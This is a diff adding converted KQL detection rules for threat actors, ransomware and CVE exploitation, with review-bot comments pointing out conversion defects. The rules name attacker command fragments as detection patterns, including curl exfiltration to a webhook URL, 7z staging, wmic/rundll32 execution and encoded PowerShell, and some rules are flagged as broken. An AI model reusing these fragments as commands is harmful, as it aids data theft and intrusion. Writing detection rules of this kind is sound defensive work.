+// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql
new file mode 100644
index 00000000..6d08322a
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql
@@ -0,0 +1,10 @@
+// Title: UNC2452 Process Creation Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-22
+// Level: high
+// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
new file mode 100644
index 00000000..84f03c5d
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Barracuda ESG Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith "/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
new file mode 100644
index 00000000..79424796
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Email Exfiltration File Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
new file mode 100644
index 00000000..fc00805c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Potential SEASPY Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: critical
+// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
new file mode 100644
index 00000000..7e281dd2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql
@@ -0,0 +1,13 @@
+// Title: Ursnif Redirection Of Discovery Commands
+// Author: @kostastsale
+// Date: 2023-07-16
+// Level: high
+// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql
new file mode 100644
index 00000000..9c8bac3d
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql
@@ -0,0 +1,12 @@
+// Title: ZxShell Malware
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2017-07-20
+// Level: critical
+// Description: Detects a ZxShell start by the called and well-known function name
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
new file mode 100644
index 00000000..31e5a823
--- /dev/null
+++ b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
new file mode 100644
index 00000000..682dd2a9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: FunkLocker Ransomware File Creation
+// Author: Saiprashanth Pulisetti ( @Prashanthblogs)
+// Date: 2025-08-08
+// Level: high
+// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".funksec"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql
new file mode 100644
index 00000000..bf5f2f9e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: LockerGoga Ransomware Activity
+// Author: Vasiliy Burov, oscd.community
+// Date: 2020-10-18
+// Level: critical
+// Description: Detects LockerGoga ransomware activity via specific command line.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-i SM-tgytutrc -s"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql
new file mode 100644
index 00000000..7e08e896
--- /dev/null
+++ b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Conti Ransomware Activity
+// Author: frack113
+// Date: 2021-10-12
+// Level: critical
+// Description: Detects a specific command used by the Conti ransomware group
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql
new file mode 100644
index 00000000..df55105f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dtrack RAT Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-30
+// Level: critical
+// Description: Detects potential Dtrack RAT activity via specific process patterns
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
new file mode 100644
index 00000000..19067c7b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: Apache Spark Shell Command Injection - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-20
+// Level: high
+// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
new file mode 100644
index 00000000..fa8662cb
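Review bot: The Description line of the Apache Spark hunk names CVE-2014-6287 while the Tags line carries cve.2022-33891, so the header contradicts itself; CVE-2022-33891 is the Apache Spark UI command-injection issue the Title refers to, and the description should read `// Description: Detects attempts to exploit an apache spark server via CVE-2022-33891 from a commandline perspective`. The mismatch is presumably inherited from the upstream rule text, in which case it is worth fixing at the source as well so the next conversion does not reintroduce it.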
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql
@@ -0,0 +1,10 @@
+// Title: Atlassian Confluence CVE-2022-26134
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
new file mode 100644
index 00000000..26f130b7
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
@@ -0,0 +1,12 @@
+// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
+// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
+An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql
new file mode 100644
index 00000000..422b2798
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql
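Review bot: The Description of the Commvault qlogin hunk continues on a second added line (`+An attacker can inject the ...`) that carries no `//` prefix, so that sentence sits outside any comment and the query will fail to parse when pasted into Advanced Hunting. The converter should prefix every line of a multi-line Sigma description, e.g. `// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.`, or fold the description onto one line. The same defect appears in the GoAnywhere MFT, SharePoint ToolShell File Create, SharePoint ToolShell Indicators, Suspicious CrushFTP Child Process, Blackbyte Ransomware Registry, Commvault QOperation and CVE-2020-1048 Printer Ports hunks; the empty `+` line the converter emits after each such description looks like the YAML block's trailing newline and can be dropped at the same time.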
@@ -0,0 +1,12 @@
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits
+// Author: Sittikorn S, frack113
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
new file mode 100644
index 00000000..b13dcffa
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql
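Review bot: The two `RegistryKey endswith "...\\InprocServer32\\(Default)"` terms in the registry hunk keep the Sysmon `TargetObject` habit of appending `(Default)` for the default value, but in DeviceRegistryEvents the value name is carried separately in `RegistryValueName` and `RegistryKey` holds the key path only, so as written the `endswith` is unlikely to ever match. The likely intended form is `RegistryKey endswith "...\\InprocServer32"` combined with a `RegistryValueName` test for the default value; how the default value is represented in that column should be confirmed against a live event before the rule is relied on. Since the converter produced this from a generic `TargetObject` mapping, the same translation gap probably affects every registry rule that names a value rather than a key.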
@@ -0,0 +1,12 @@
+// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
+// Author: Sittikorn S
+// Date: 2021-07-16
+// Level: critical
+// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
new file mode 100644
index 00000000..40f07b02
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql
@@ -0,0 +1,13 @@
+// Title: CVE-2024-50623 Exploitation Attempt - Cleo
+// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
+// Date: 2024-12-09
+// Level: high
+// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql
new file mode 100644
index 00000000..c1d338a1
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql
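Review bot: The Description line of the Cleo hunk misspells the vendor as "Celo" (`spawning from the Celo software suite`), which contradicts the Title and will trip anyone grepping the rule set by product name; it should read `// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Cleo software suite with suspicious Powershell commandline.`. The typo presumably comes from the upstream rule, so a fix there would keep it from returning on the next conversion.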
@@ -0,0 +1,12 @@
+// Title: DNS RCE CVE-2020-1350
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-15
+// Level: critical
+// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats
+// False Positives:
+// - Unknown but benign sub processes of the Windows DNS service dns.exe
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql
new file mode 100644
index 00000000..7231aecb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql
@@ -0,0 +1,10 @@
+// Title: Exploited CVE-2020-10189 Zoho ManageEngine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-03-25
+// Level: high
+// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
new file mode 100644
index 00000000..41e21aea
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-09-08
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
new file mode 100644
index 00000000..aacf7839
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
+// Author: @kostastsale
+// Date: 2022-01-14
+// Level: high
+// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
+
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
new file mode 100644
index 00000000..7038bf52
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2022-26809 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats
+// False Positives:
+// - Some cases in which the service spawned a werfault.exe process
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
new file mode 100644
index 00000000..90f0939d
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
@@ -0,0 +1,10 @@
+// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2023-01-21
+// Level: high
+// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
new file mode 100644
index 00000000..e660a078
--- /dev/null
+++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
